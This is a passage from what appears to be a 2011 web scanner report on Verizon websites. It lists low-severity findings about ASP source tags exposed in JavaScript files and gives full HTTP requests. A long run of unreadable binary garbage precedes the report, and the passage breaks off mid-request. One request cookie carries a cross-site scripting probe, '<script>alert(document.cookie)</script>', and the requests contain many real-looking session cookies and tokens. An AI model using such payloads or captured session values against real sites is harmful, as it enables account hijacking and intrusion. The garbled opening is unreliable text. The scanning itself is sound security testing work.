!.l.    ...4.Blz........a.....\8N......Vj....."....pbl.../.TG<.P......y.k..Oz...%.kc...G.{..u\y....    ....v.+Q.Z..$....F;..c...%YpA*.b.).u...)KQ.7.7......t....{/..ZV{...E!-;.......=3s...9e..../.h&...J..Ml...{#..T......I.;.....}.U......J.^.S......9.U.L.{3dE..^..Bv....r3z.......mN.81z.....7.T.B....UJ...)...[d.M.K...M.5.e/.}^C....@..lJ.....j.VC...w..zq...GRI.....Y..}..J..s.vv............T.c-..y.5=.1e..x..U~8).l'..?..Vk2..O(..V)..u.%X...I    }.....X.h...
...j{..U..
.K...4..p+*.Q.].v..u$7...j..{..T....#.d1..KH#n.....5o....J..{.TMd.Qc........}vSzj.b.....K.~l...Y..u/b.d.M^\q.J
....6z;v......9.g.b..?O .y.7..E..r.ox...zEs;]}..K..p#y'p).i]JN.~C.....c.V[...Z..G...t\@.*.zU.n.kpt..A......@(.j...........F.F.Cr#.X.....U.t-w...z.3q....:.3*x.7>Og.d    =RE.6z.)qn..$.J./.r..^Z6/k......6.nzSe7..(./..s..\S.tU....m.U.b......1qS.t=v.3.....-..U;..U..z.fc...r..._+.z....Ty..W~?..5f.T.m....t+Ms9..{z.@.....P.".;.&Ro.D.. ..3.-..y.j.U7..o.j!..Nn7.\:..y%!k0*.H...K.t.F's...k..}/H*.O...G.:vs'n.h"..........:M...lF........RNp..;...D...5.:........3...S..Q.id..-D.[F&r....D.sS5.M.....WJH.n.a.+.p....#v|v.V.K6J.\.hN.....}....y..^=.{.-{.uTT..>=...q..3...D..J..u...%z..G{.."E)}........e.~....f.:...H.Ay.A...%..th.ZO#.|K...e%....%..D#...L...I....t+:....t.Cr...[..>L...J.CI.tl.....m5..9>gz.p...y..g.qA'eA......cA.l.......6o..|.I.........#..}...52...s.'.p..C....8..Iq9...<Y}G..X%.....r_..H.&.....C=E.`..c.Q.A...LC.E5M.DO...N.)..~...>.t......h.=.9..*..D....g....:...z.....J#....~.3..}?.RZ......?.J..F.0..{D.w....x.....d.._:..#...G.-...O...ub.z....s..9%.._#s.......S.yNOs.8=....,......N..^......B.gO....4.=...r..>.q{1....8yCVb./.qLo...
.X...f..P.+.V..p.3.}...Wg.*f.p.5M.N....[....,.A.1..4{v....$.*..uG..#...j.9..\................M.Q.i.........\... X.#............\...J,....|....\.._...'......=<.....4 ...tw..V...4.^...1..]..e%F..g=\.....{.l..c...........vC\.....2.......X}..?...w...lZb...0M:..7..%.9.0..#(..T@.o.............LR.X........`.......1.!.[bpO....4.'...Y...e>...-JC=......b...m...<........>...c.......1.eo...6c....b....-B..Tb....c|......|...M.<z.dXe.}.......e......m/..N...Z-tYeD...8.Z..~..\."{.L..m.F~O..b..].%........>Dl....}.k..U2.4....c-..e........mt...(..>.....|b.....s.
........m..].......J...j.&")..gO..wn..2.'p......j...W.~o.a...........]...T.kf.o
....R.).t....f........$$N.Cn.>.<.....C....] .W......=.....c;|j.2........3q........Ijv.=.n#C.g..%.-......Z..C......}....T.1...i...l+..G.=o..tL...?...(...t..........d.pFr..K.....dj.9~...<.......,..    .......5Z;.h..F....N.F..{.]s.m....SX.....T$X.].Ij.%'H..........}5.a.#.,%5........3I.&n...)..M..v.D.r.../.............m.^..o.V......<_~.....E...{4......u....."-.w...9]... .$.H%..%..P.....F*K.....r....n.0U..9...n.....w...........E.w!.~n+r+.m.3:F5...S.9]o.~.....V,e.[..]X.|ei...A.w[.D..<..#.s./YO^.~6....0..[..!.....}.#.6..Q_..O.A.i.~,.?...k>.....&*.hu7...6.5D..C...]C.B..m*=...4z.c8......A...{&=..E....(..,....c.d..~.w.7...-j.q..:v.......~../...M..AL.G.....M10.    L..K...-f.Q$f.Q,f...s........HUw...P.......b....~...J_....jU..K.6.....l.G.4....%..3.%..^k..)5..t4|..%.^R...\.w./qc.,q.p..K...z...G,...1h
WUW../w...C..pov.U..:5....QJ.9X....4.w!`.....'...v..MT...[......Vw.....H..6w../>...$F[7...........$.x.GS-.....mH4l...[.m%..sz*.P...7L(%.9!..cH8...}....L...$^tc"O    ..    ...D    ........M$...3p'(.!_.>..P.z.j.)......m..x..UE8.....H"....]D....\P.C...H.B    .H8.O...Q.p.    G.    ..0... .h>a:.fP.!$..'.C.|JhD..|..$,...H8.OX...E.,).........(;..n:6....X$6....k.bcQ......-6...g})?......~..R.?.T..= b/.q.D..'.@...>@......".'.......^q.=q.m.G..])b[v..%....b6...#l.....iQvy..t\..W....e.BY.c}..+^...{..[.......p.w..."{.h%&.j...    K...._-....w..)lD.B.....)...k..3....aJ~.`.qe.L.."QUL...x.E...,.UL,.]l%...K...H.W.u'J...:.....b1    Xo{.d`..S....+.~..nRz.
...],f.[./......*&.cNq&....b9..W...*.0|.8...e.`-._4.R.'_..y...y.X...)..U..'H...G.t"...m.I.G...oh......$o,.c.x.5...bSqn.osq.
.V...B........:7j{q....~g.......e..}.w.rb~:.#|.(f.G'...K."R...g;....).gJ
.#E.U....\`'3.../.L1>.Y...yW.S.M.,...F..2......aj...D.........y.......?..DnO.q.....s.....:.%.,n.^?..SN........t.5..N4)...Id...|Qf.X,.....(.u...:K...i..i.e....b,.b.T....t..e...yG.y.X./.5..&..&..F.L..]..........@.a..\.f...l....P....5.L.]........-3V.....<..(s..s..........e.<b.'v.en.enr.;.2s.e..2s=b.'v.en.enq.....    e.e.,.e..d..=b..J..n....F.......f)...}.w|U....]U1!~.k.%.....n).L..).S
...m....+.9....\}..b....[.....x...97.u..C....,. V/c>........m.~Y.~.8@...{6g.1g.!5.*Y.s.C....fj.<.K...(.$n<...!.8..m.A..&RU.D.....vP..*e..T..c.)..=.O.[.O0..d.DF...s"..}
....{Iy........xH..a...w....K,.Y.\.......<.....4.3\.....w.yJ....(
...............3.x........M...f....J.c..#.M.<f..ar...w..8Sy..w=.....o{^..x.NV..d...II#......%..U~....Y>......'....y..X.z..-Cw.........).8.<+R.W.....X..~....W.z..'.z.X........7.LM..KrS.>%.I[..2f..3.0suL    suLId..z.$UFH...Ju.kg...R.....1.D.-.}..V.ce...f...$......B..O6.."AoJP.....n...2e.L..).
RF..:... e.L."S....@.u...`x....+D7.j|IV-D.....3O.....M,.+.v.D+.T.q..K..K..D...F...PK.}....].EK.C\b.'.G..e*.K...X?...cm.._...R-H3.XO....;.z....a[PB.......B...&B.....9.....j.N.8..+K
.[.,...J.....g..........N...4.p.9....|.W.....`M...;...\.O...-I.
8.S....`#`.U.]%=...K.+7.Le{.\jV.L.]o&.....%b.w
Ox..o..+...*......*.........
S%r...a.%....... I:.%A4.l"...hy....-.h.S.J.z..../..%.OA...H...=V.=:_zF...9....D....JJ...HC...KARw...O....0...,..K.yl..N?..q....=[/..X)..........K.3.......R.....'.b..Rq..#.R.Z.Lm....%.M.........Yb..'.[(.[.....>^.$}.@..../...VA..2c.8.....$......FJ..<.fu.....+.xm!..b6....;........0.+...s.o"Z..C...........L..o..........9..<..A....g.#s./2.#.b....h4..../K:..q^..*..P.. X.V.\K&.-..-y...a.2.Z..1P.r.X.8.k[..D.RS..&I3...m.W....h$...g......=.....l/..y3..i.c}.7..*.x..23.]
\..2e$@.~..+..b...^.v7H....Y.-....b....-...r....
....u^i,.4..W.D......n....`...r.b6().H.O..D.+?.f.i.NyY.....w..W~......%...5.!<P..;%..).(..d........S...........#..<...c.3J........W....2......Q...<..........PQ..A.q.c.....    qd.)..,.D..5.F....>...j.....Sl.?{Ln....m.$..?J..P.q.....8>.;.@Iob.0...L.y{3......B7.........@._.    .h?.......K(...d:.)...C.|.?>.....<..U..........<.&...    ...o.b._|.+:.T,>
...[SNIP]...

12.10. http://static-business.verizon.net/SMBPortalWeb/resources/js/common.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://static-business.verizon.net
Path:	/SMBPortalWeb/resources/js/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /SMBPortalWeb/resources/js/common.js HTTP/1.1
Host: static-business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 27 Jul 2011 06:28:59 GMT
Accept-Ranges: bytes
Content-Length: 112736
Content-Type: application/javascript
Cache-Control: max-age=86400
Date: Mon, 05 Sep 2011 22:35:53 GMT
Connection: close
Vary: Accept-Encoding

var _lastActivityDate=new Date();function checkSessionActivity(){var c=new Date();var a=0;c.setTime(Math.abs((new Date()).getTime()-_lastActivityDate.getTime()));a=Math.floor(c.getTime()/(1000*60));va
...[SNIP]...
ow.movedownvar){clearTimeout(movedownvar)}}function wsMovetop(){wsStopscroll();wsCrossobj.style.top=0+"px"}function wsGetcontent_height(){wsContentheight=2880}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.html","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}wsGetcontent_height();function reload(){return}function closeAllDiv(a){try{if((a=="mp
...[SNIP]...
tyle.zIndex="-1";a.style.display="none"}if(document.getElementById("searchHeaderText")!=null){document.getElementById("searchHeaderText").focus()}return false}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}function contentDisplay(d,c,f,a){var e;if(c!=null&&c!=""&&a=="href"){e=c}else{e=d}e=e+"&r
...[SNIP]...

12.11. http://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/Content/verizonglobalhome/Includes/Javascript/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Content/verizonglobalhome/Includes/Javascript/common.js HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; hbxRet=Y; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Content-Length: 20021
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Aug 2011 22:05:28 GMT
Accept-Ranges: bytes
ETag: "084291f9750cc1:5573"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:14:28 GMT
Connection: close

var req ;
var t1;
var cufOff = false;
var xpDecisions="";
var cid1="";
var cid2="";
var cid3="";
var cid4="";
var objAjax=null;
var clickreq;
var TryCountAjax = 0;
var TryCountD = 0;

var
...[SNIP]...
<4)
           {
               TryCountAjax=TryCountAjax+1;
               setTimeout(sPromo,2000);
           }
}
}

//Ajax Call xmlhttprequest -Logging start
//var chkXplus1log = "<%=chkXplus1Log%>";
var chkXplus1log = 'true';

function CallAjax(placements)
{
   if(chkXplus1log == 'true')
   {
    Createobj();
xlogParam = "xLogParam="+escape(placements) + "**" + escape(xp1src)
...[SNIP]...

12.12. http://www22.verizon.com/Residentialhelp/includes/javascript/TopLevelTab.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/Residentialhelp/includes/javascript/TopLevelTab.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Residentialhelp/includes/javascript/TopLevelTab.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Content-Length: 45226
Content-Type: application/x-javascript
Last-Modified: Thu, 25 Aug 2011 09:35:52 GMT
Accept-Ranges: bytes
ETag: "08c4a61a63cc1:5688"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:24:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:09 GMT
Connection: close

/*
***************************************************************************
       -TopLevelTabControl Functionality
       -Coded by Harmeet/Aga/Nagesh/Gopal

Main functionalities:

...[SNIP]...
r)
{
//debugger;
try{
var url = "" + window.location;
var queryStringIndex = url.indexOf('=') + 1;
    //var activeTab = url.substr(queryStringIndex);
    //var activeTab = <%=tab%>
    tabSelectedVal=activeTab;

if(activeTab.toLowerCase()=="internet")
{
document.getElementById('SuTab2').className='AcRTabM';
docu
...[SNIP]...
r)
{
// debugger;
try{
var url = "" + window.location;
var queryStringIndex = url.indexOf('=') + 1;
    //var activeTab = url.substr(queryStringIndex);
    //var activeTab = <%=tab%>
    tabSelectedVal=activeTab;

if(activeTab.toLowerCase()=="internet")
{
document.getElementById('TopMenu1').className='subnavcurrent launcher';

...[SNIP]...

12.13. http://www22.verizon.com/content/contactus/includes/javascript/TopLevelTab.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www22.verizon.com
Path:	/content/contactus/includes/javascript/TopLevelTab.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /content/contactus/includes/javascript/TopLevelTab.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/ContactUs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39

Response

HTTP/1.0 200 OK
Content-Length: 36192
Content-Type: application/x-javascript
Last-Modified: Fri, 03 Jun 2011 15:18:56 GMT
Accept-Ranges: bytes
ETag: "07068e122cc1:6f2e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:38:27 GMT
Connection: close

       /*
***************************************************************************
       -TopLevelTabControl Functionality
       -Coded by Harmeet/Aga/Nagesh/Gopal

Main functionalities:

...[SNIP]...
ompop,solncenter)
{

var url = "" + window.location;
var queryStringIndex = url.indexOf('=') + 1;
    //var activeTab = url.substr(queryStringIndex);
    //var activeTab = <%=tab%>
    tabSelectedVal=activeTab;

if(activeTab.toLowerCase()=="internet")
{
document.getElementById('TopMenu1').className='subnavcurrent launcher';

...[SNIP]...

12.14. https://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www22.verizon.com
Path:	/Content/verizonglobalhome/Includes/Javascript/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Content/verizonglobalhome/Includes/Javascript/common.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Content-Length: 20021
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Aug 2011 22:05:28 GMT
Accept-Ranges: bytes
ETag: "084291f9750cc1:7836"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:19:47 GMT
Connection: keep-alive

var req ;
var t1;
var cufOff = false;
var xpDecisions="";
var cid1="";
var cid2="";
var cid3="";
var cid4="";
var objAjax=null;
var clickreq;
var TryCountAjax = 0;
var TryCountD = 0;

var
...[SNIP]...
<4)
           {
               TryCountAjax=TryCountAjax+1;
               setTimeout(sPromo,2000);
           }
}
}

//Ajax Call xmlhttprequest -Logging start
//var chkXplus1log = "<%=chkXplus1Log%>";
var chkXplus1log = 'true';

function CallAjax(placements)
{
   if(chkXplus1log == 'true')
   {
    Createobj();
xlogParam = "xLogParam="+escape(placements) + "**" + escape(xp1src)
...[SNIP]...

12.15. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 